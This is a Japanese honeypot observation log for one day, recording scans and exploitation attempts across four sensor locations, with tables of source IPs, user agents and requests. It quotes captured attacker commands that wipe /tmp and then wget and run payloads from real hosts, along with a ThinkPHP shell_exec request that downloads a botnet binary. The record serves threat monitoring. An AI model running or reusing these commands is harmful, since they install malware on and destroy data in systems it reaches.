2023/01/23 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/01/23分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

aiohttpによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

Location:US

/.gitへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 5.255.105.71/76d32be0.sh;
sh /tmp/76d32be0.sh

cd /tmp;
rm -rf *;
wget heylitimysun.top/jaws;
sh /tmp/jaws

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 45.12.253.180/jaws;
sh /tmp/jaws

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 137.175.17.190/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：65 (前日比：-149)
US：総アクセス数：300 (前日比：175)
UK：総アクセス数：151 (前日比：-276)
SG：総アクセス数：103 (前日比：-3)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.67.222.87	United States
1	3.85.214.243	United States
1	44.212.207.59	United States
1	45.56.108.128	United States
1	45.79.181.223	United States
1	45.145.184.158	Netherlands
1	47.114.1.17	China
1	65.49.20.69	United States
1	66.175.213.4	United States
1	69.162.243.124	United States
8	95.214.235.205	Ukraine
2	109.237.97.180	Russia
1	117.198.255.232	India
4	128.1.248.42	United States
8	135.125.217.54	France
8	135.125.244.48	France
1	158.69.134.51	Canada
2	165.227.33.236	United States
1	167.94.146.57	United States
1	172.104.11.4	United States
1	172.104.11.46	United States
2	172.105.128.13	United States
1	179.43.177.242	Panama
4	183.136.225.32	China
2	185.180.143.80	Portugal
3	185.254.196.115	Ukraine
1	192.227.173.18	United States
1	193.35.18.189	Bulgaria
1	193.35.18.192	Bulgaria
1	197.55.224.58	Egypt
2	206.189.158.79	United States

UserAgent一覧

件数	UserAgent
12	`-`
1	`ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19)`
2	`Go-http-client/1.1`
2	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1`
1	`Python/3.7 aiohttp/3.7.4.post0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01H\x01`
10		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]google[.]cn:443`	HTTP/1.1
32	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
4	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/webfig/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
101	5.59.50.150	Czechia
7	20.127.5.86	United States
1	37.44.238.168	France
3	41.129.148.31	Egypt
3	44.212.207.59	United States
2	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
2	45.79.181.251	United States
37	51.79.29.48	Canada
2	52.156.24.182	United States
2	52.173.15.0	United States
1	64.62.197.11	United States
20	103.114.107.34	Vietnam
52	112.47.34.246	China
1	123.146.116.16	China
4	128.14.141.34	United States
2	128.199.17.186	United Kingdom
1	144.86.46.1	Saudi Arabia
1	152.89.196.211	Russia
2	161.97.174.99	Germany
2	162.142.125.7	United States
2	162.142.125.9	United States
2	162.142.125.213	United States
1	162.243.146.34	United States
2	165.22.56.135	United States
2	167.248.133.47	United States
2	170.64.160.143	United States
1	172.104.11.4	United States
1	172.104.11.46	United States
2	172.105.128.11	United States
1	172.105.128.12	United States
1	173.214.175.178	United States
2	179.43.177.242	Panama
6	183.136.225.32	China
8	185.254.196.223	Ukraine
1	192.155.90.118	United States
1	192.227.173.18	United States
2	193.35.18.189	Bulgaria
1	193.35.18.192	Bulgaria
1	193.35.18.224	Bulgaria
7	195.133.40.25	Czechia
1	198.235.24.129	United States
4	205.185.118.237	United States

UserAgent一覧

件数	UserAgent
87	`-`
5	`Go-http-client/1.1`
3	`Hello, world`
1	`Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
101	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
20	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
47	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0`
9	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
7	`python-requests/2.20.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x16\x03\x01\x02\xb2\x01`
3		`\x16\x03\x01\x02`
22		`\x16\x03\x01`
2		`\x16\x03`
3	CONNECT	`google[.]com:443`	HTTP/1.1
47	GET	`/.env`	HTTP/1.1
6	GET	`/.git/config`	HTTP/1.1
1	GET	`/2015/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2016/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2017/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2018/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/demo/.git/config`	HTTP/1.1
1	GET	`/dev/.git/config`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/media/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/metrics`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
101	GET	`/phpmyadmin/`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+5[.]255[.]105[.]71/76d32be0.sh;sh+/tmp/76d32be0.sh`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun[.]top/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/v2/`	HTTP/1.1
1	GET	`/web/.git/config`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	GET	`http[:]//34[.]68[.]118[.]83:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/PMA2005/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/p/m/a/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/php-my-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/pma2005/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/secret/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/secret123/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/typo3/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/websql/scripts/setup.php`	HTTP/1.0
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
9	POST	`/boaform/admin/formLogin`	HTTP/1.1
4	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.181.86.250	Ukraine
1	5.188.210.227	Russia
1	45.33.80.243	United States
3	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
4	45.79.181.223	United States
1	45.137.206.216	Netherlands
1	49.88.78.214	China
38	51.79.29.48	Canada
1	61.152.197.23	China
1	64.62.197.151	United States
1	77.91.78.234	Russia
2	92.255.85.183	Hong Kong
1	93.115.236.145	Iran
1	101.74.200.34	China
1	107.170.250.10	United States
2	109.237.97.180	Russia
52	112.47.34.246	China
1	116.206.197.72	Indonesia
4	128.1.248.42	United States
1	152.89.196.211	Russia
2	156.194.159.18	Egypt
2	167.94.138.44	United States
2	167.94.145.57	United States
2	167.248.133.117	United States
1	172.104.11.34	United States
2	179.43.177.242	Panama
1	182.117.163.179	China
2	185.180.143.140	Portugal
8	185.254.196.223	Ukraine
1	192.155.90.118	United States
2	193.35.18.189	Bulgaria
1	193.35.18.224	Bulgaria
1	198.235.24.158	United States
4	205.185.118.237	United States

UserAgent一覧

件数	UserAgent
75	`-`
1	`Go-http-client/1.1`
1	`Hello, World`
4	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
47	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
8	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`SSH-2.0-libssh2_1.10.0`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
13		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
47	GET	`/.env`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/druid/index.html`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20wget%20http[:]//185[.]223[.]93[.]118/assailant.x86;chmod%20777%20assailant.x86;./assailant.x86`	HTTP/1.1
3	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]12[.]253[.]180/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/v1/agent/self`	HTTP/1.1\n
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PMA2005/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/p/m/a/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-my-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma2005/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/secret/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/secret123/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/typo3/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
8	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.199.180.236	United States
2	37.44.238.168	France
1	45.12.253.180	Bulgaria
1	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
37	51.79.29.48	Canada
3	66.175.213.4	United States
1	92.255.85.183	Hong Kong
2	109.237.97.180	Russia
4	128.14.141.34	United States
2	138.197.140.142	United States
1	139.59.105.11	Singapore
1	144.48.106.220	Singapore
5	146.19.24.230	Poland
1	152.89.196.211	Russia
2	162.142.125.7	United States
2	162.142.125.219	United States
2	164.92.167.181	United States
2	167.248.133.119	United States
1	172.104.11.4	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
1	172.174.113.179	Germany
1	173.214.175.178	United States
2	179.43.177.242	Panama
8	183.136.225.32	China
2	185.225.74.55	Bulgaria
1	192.155.90.118	United States
2	193.35.18.189	Bulgaria
1	193.35.18.224	Bulgaria
5	205.185.118.237	United States
1	205.210.31.32	United States
1	222.136.99.20	China

UserAgent一覧

件数	UserAgent
23	`-`
2	`Abcd`
2	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozila/5.0`
6	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
